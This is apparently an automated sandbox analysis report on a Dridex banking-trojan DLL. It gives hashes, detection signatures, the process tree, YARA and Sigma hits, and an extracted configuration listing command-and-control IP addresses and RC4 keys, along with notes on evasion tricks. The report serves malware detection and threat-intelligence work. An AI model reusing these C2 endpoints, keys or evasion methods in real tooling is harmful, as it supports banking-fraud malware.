Play interactive tour

Edit tour

Windows Analysis Report triage_dropped_file

Overview

General Information

Sample Name:	triage_dropped_file (renamed file extension from none to dll)
Analysis ID:	544201
MD5:	232a73868213c05f54359f7d7c5d349f
SHA1:	2de77f30b087dfb182e414c341c6d6426e752fd9
SHA256:	47738cc4c2025a2f4655695777fabde7c80bf272406b4dd89efbfab34ff5780b
Tags:	22201dlldridex
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4388 cmdline: loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 2920 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 5340 cmdline: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.669892514.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.672146465.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.703106750.000000006E7C1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.0.rundll32.exe.6e7c0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e7c0000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6e7c0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6e7c0000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2920, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1, ProcessId: 5340

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.6e7c0000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: triage_dropped_file.dll

Virustotal: Detection: 21%

Perma Link

Source: triage_dropped_file.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: triage_dropped_file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.676927759.000000000498C000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676279098.000000000498C000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677824311.000000000498D000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677706288.000000000498D000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdbc source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.674327530.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676602249.000000000098F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677581016.000000000098F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbW source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.677096028.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676634581.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676854151.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb; source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbO source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: triage_dropped_file.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000007.00000003.676602249.000000000098F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677581016.000000000098F000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdbr source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb8 source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.674327530.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbq source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb[ source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbe source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbA source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbi source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.677096028.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676634581.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676854151.000000000099B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb] source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28

Source: WerFault.exe, 00000007.00000002.697619692.00000000048FC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.703186360.000000006E7DF000.00000002.00020000.sdmp	String found in binary or memory: http://www.forex-broker.websiteDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.0.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e7c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e7c0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.669892514.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.672146465.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.703106750.000000006E7C1000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: triage_dropped_file.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: triage_dropped_file.dll

Binary or memory string: OriginalFilenameIha.dllD vs triage_dropped_file.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D0730	0_2_6E7D0730
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D9370	0_2_6E7D9370
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D143C	0_2_6E7D143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7C8428	0_2_6E7C8428
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7CA4E8	0_2_6E7CA4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7C1494	0_2_6E7C1494

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D2234 NtDelayExecution,		0_2_6E7D2234
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D2820 NtAllocateVirtualMemory,		0_2_6E7D2820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: triage_dropped_file.dll

Virustotal: Detection: 21%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5340 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5340

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER747.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: triage_dropped_file.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: triage_dropped_file.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.676927759.000000000498C000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676279098.000000000498C000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677824311.000000000498D000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677706288.000000000498D000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdbc source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000000.00000003.674327530.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676602249.000000000098F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677581016.000000000098F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbW source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.677096028.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676634581.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676854151.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb; source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdbO source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: triage_dropped_file.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000007.00000003.676602249.000000000098F000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.677581016.000000000098F000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdbr source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb8 source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.674327530.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbq source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb[ source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbe source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbA source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdbi source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.677096028.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676634581.000000000099B000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.676854151.000000000099B000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.681654140.0000000004E30000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.681649017.0000000004C51000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb] source: WerFault.exe, 00000007.00000003.681660541.0000000004E36000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7CF6A8 push esi; mov dword ptr [esp], 00000000h

0_2_6E7CF6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
